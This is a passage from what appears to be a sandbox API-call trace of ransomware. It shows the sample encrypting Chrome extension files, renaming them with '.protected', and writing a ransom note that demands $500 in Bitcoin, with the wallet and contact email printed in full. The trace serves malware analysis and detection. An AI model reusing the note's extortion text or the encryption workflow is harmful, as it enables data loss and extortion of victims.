lpString2="..") returned 0 [0080.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json") returned 159 [0080.970] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.971] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x36b, lpOverlapped=0x0) returned 1 [0080.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x36b, lpOverlapped=0x0) returned 1 [0080.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.981] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.982] CloseHandle (hObject=0x168) returned 1 [0080.982] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected") returned 169 [0080.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.983] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.983] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\RESTORE_FILES.txt") returned 163 [0080.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0080.983] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.983] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.984] lstrlenA (lpString="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") returned 684 [0080.984] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.984] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.984] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.984] CloseHandle (hObject=0x164) returned 1 [0080.984] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en") returned 145 [0080.985] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0080.985] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*") returned 147 [0080.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0x47bc10 [0080.985] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\.") returned 147 [0080.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.985] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.985] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.985] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.985] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\..") returned 148 [0080.986] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.986] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.986] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.986] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.986] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.986] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.986] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.986] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json") returned 159 [0080.987] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.987] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.993] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0080.994] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.994] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.994] CloseHandle (hObject=0x168) returned 1 [0080.994] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected") returned 169 [0080.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.protected")) returned 1 [0080.995] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.995] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.995] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\RESTORE_FILES.txt") returned 163 [0080.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0080.995] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.995] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.996] lstrlenA (lpString="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") returned 684 [0080.996] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.996] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.996] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.996] CloseHandle (hObject=0x164) returned 1 [0080.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.996] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB") returned 148 [0080.996] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.996] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*") returned 150 [0080.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.997] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\.") returned 150 [0080.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\..") returned 151 [0080.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.997] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json") returned 162 [0080.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
